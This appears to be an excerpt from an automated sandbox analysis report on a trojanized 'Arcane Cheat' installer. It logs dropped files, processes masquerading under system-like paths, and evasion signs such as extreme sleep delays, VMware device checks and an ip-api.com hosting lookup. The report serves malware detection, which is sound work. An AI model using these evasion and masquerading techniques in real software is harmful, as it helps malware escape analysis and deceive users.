            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Memory allocated: 28C0000 memory reserve | memory write watch
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Memory allocated: 1AAB0000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exe Memory allocated: 3050000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exe Memory allocated: 1B260000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exe Memory allocated: 7B0000 memory reserve | memory write watch
            Source: C:\Windows\addins\audiodg.exe Memory allocated: 1A4F0000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exe Memory allocated: 1090000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exe Memory allocated: 1A9E0000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exe Memory allocated: C90000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exe Memory allocated: 1A8D0000 memory reserve | memory write watch
            Source: C:\Recovery\explorer.exe Code function: 40_2_00007FFD9BA90525 sldt word ptr [eax]
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\addins\audiodg.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Window / User API: threadDelayed 1195
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Window / User API: threadDelayed 997
            Source: C:\Windows\addins\audiodg.exe Window / User API: threadDelayed 367
            Source: C:\Recovery\explorer.exe Window / User API: threadDelayed 365
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1750
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1810
            Source: C:\Recovery\explorer.exe Window / User API: threadDelayed 367
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1788
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1967
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1804
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-LS3UA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\java.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsoundds.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxwebkit.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-OMDGH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr120.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M8DR9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxmedia.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\resource.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\kcms.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1D9V4.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TJN2U.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RKJ6P.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssv.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-OVE01.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6EJKR.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-H7O6N.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_d3d.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmid.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-7TEQQ.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8GHN8.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GFQTQ.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2launcher.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FDP9A.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\t2k.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\msvcr100.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RPV0O.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\npt.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\npdeployJava1.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-1RSEV.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-069DQ.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KFFNG.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\unins000.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3TU72.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-NE044.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FA3UT.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7LLC2.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssvagent.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2iexp.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-90393.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O1CKK.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2ssv.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\deployJava1.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\servertool.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-2KSRS.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\java_crw_demo.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsound.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MV7G1.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack200.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F27BH.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmiregistry.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-11A56.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RBKCS.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RMB9M.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jjs.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4UUQJ.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-T1J1I.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jli.dll (copy)
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-162RA.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FF2ON.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CSEKM.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-PFI2B.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_shfoldr.dll
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dll (copy)
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 2180 Thread sleep count: 1195 > 30
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 2180 Thread sleep count: 997 > 30
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 6268 Thread sleep time: -30000s >= -30000s
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 4904 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\addins\audiodg.exe TID: 5164 Thread sleep count: 304 > 30
            Source: C:\Windows\addins\audiodg.exe TID: 8548 Thread sleep count: 367 > 30
            Source: C:\Windows\addins\audiodg.exe TID: 7240 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\explorer.exe TID: 2500 Thread sleep count: 365 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 1750 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8260 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep count: 1810 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Recovery\explorer.exe TID: 3372 Thread sleep count: 367 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep count: 1788 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344 Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116 Thread sleep count: 1967 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348 Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144 Thread sleep count: 1804 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\addins\audiodg.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\addins\audiodg.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\explorer.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\explorer.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0082A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0082A5F4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0083B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0083B8E0
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0083DD72 VirtualQuery,GetSystemInfo,3_2_0083DD72
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\addins\audiodg.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: browserwinsvc.exe, 00000007.00000002.1948355180.000000001C2F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AutoItXxJ
            Source: browserwinsvc.exe, 00000007.00000002.1947183113.000000001C24D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\?
            Source: is-KHA4M.tmp.2.dr Binary or memory string: java/lang/VirtualMachineError
            Source: is-KHA4M.tmp.2.dr Binary or memory string: Unable to link/verify VirtualMachineError class
            Source: wscript.exe, 00000004.00000003.1746564462.0000000003066000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: browserwinsvc.exe, 00000007.00000002.1948011318.000000001C2DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\7K
            Source: browserwinsvc.exe, 00000007.00000002.1947897628.000000001C2C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}KH
            Source: is-KHA4M.tmp.2.dr Binary or memory string: m{constant pool}code cache C-heap hand metaspace chunks dict zone strs syms heap threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be 